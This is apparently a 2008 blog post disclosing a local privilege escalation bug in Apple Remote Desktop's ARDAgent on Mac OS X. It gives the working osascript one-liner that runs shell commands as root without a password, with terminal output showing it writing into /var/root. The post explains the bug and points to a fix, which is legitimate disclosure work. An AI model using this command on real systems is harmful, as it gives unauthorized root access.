Super-simple local privilege escalation exploit on Mac OS X

Big ouch for Apple today..

One of the nice things about Mac OS X is that it requires you to authenticate yourself by providing a password when a program is about to run something as superuser (something like Vista's UAC but arguably more seamless). This helps protect against malicious programs attempting to do funky things as superuser.

However, an exploit was discovered in Apple Remote Desktop that circumvents that entirely:

$ uname -a
Darwin mymac.local 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386 i386
$ whoami
jsmith
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root

Interpretation for those who are not as familiar with shell commands: that osascript command just allowed a regular user to run the whoami program as superuser -- no passwords or other hurdles required. Obviously the "whoami" part can be replaced with some other more nefarious code.

Here's a very simple example. The Mac has a /var/root/ directory that's owned by root and is not accessible by regular users:

$ ls -l /var/root/
ls: : Permission denied

Let's take a peek into it..

$ sudo -s
bash-3.2# ls -l /var/root/
total 16
-rw-r--r--  1 root  wheel    3 Nov 30  2007 .CFUserTextEncoding
-r--r--r--  1 root  wheel   10 Sep 23  2007 .forward
drwx------  3 root  wheel  102 Dec  1  2007 .ssh
drwx------  7 root  wheel  238 Nov 30  2007 Library
bash-3.2# exit
$

Now, back as a regular user, we run this...

$ osascript -e 'tell app "ARDAgent" to do shell script "echo abc >/var/root/testfile"';

...which creates the testfile in /var/root

$ sudo -s
bash-3.2# ls -l /var/root/
total 24
-rw-r--r--  1 root  wheel    3 Nov 30  2007 .CFUserTextEncoding
-r--r--r--  1 root  wheel   10 Sep 23  2007 .forward
drwx------  3 root  wheel  102 Dec  1  2007 .ssh
drwx------  7 root  wheel  238 Nov 30  2007 Library
-rw-rw-rw-  1 root  wheel    4 Jun 19 18:21 testfile
bash-3.2# cat /var/root/testfile
abc

Again, no passwords required.

This only works locally (you need to have a regular user account on the Mac) but is still Not A Good Thing. A virus or worm could potentially use this vulnerability to gain a foothold on the system and spread.

So how do you fix it? See Matasano's post on this bug for suggestions.

Del.icio.us Digg It! Facebook Reddit StumbleUpon Technorati
Posted by Lawrence Teo
Labels: , ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)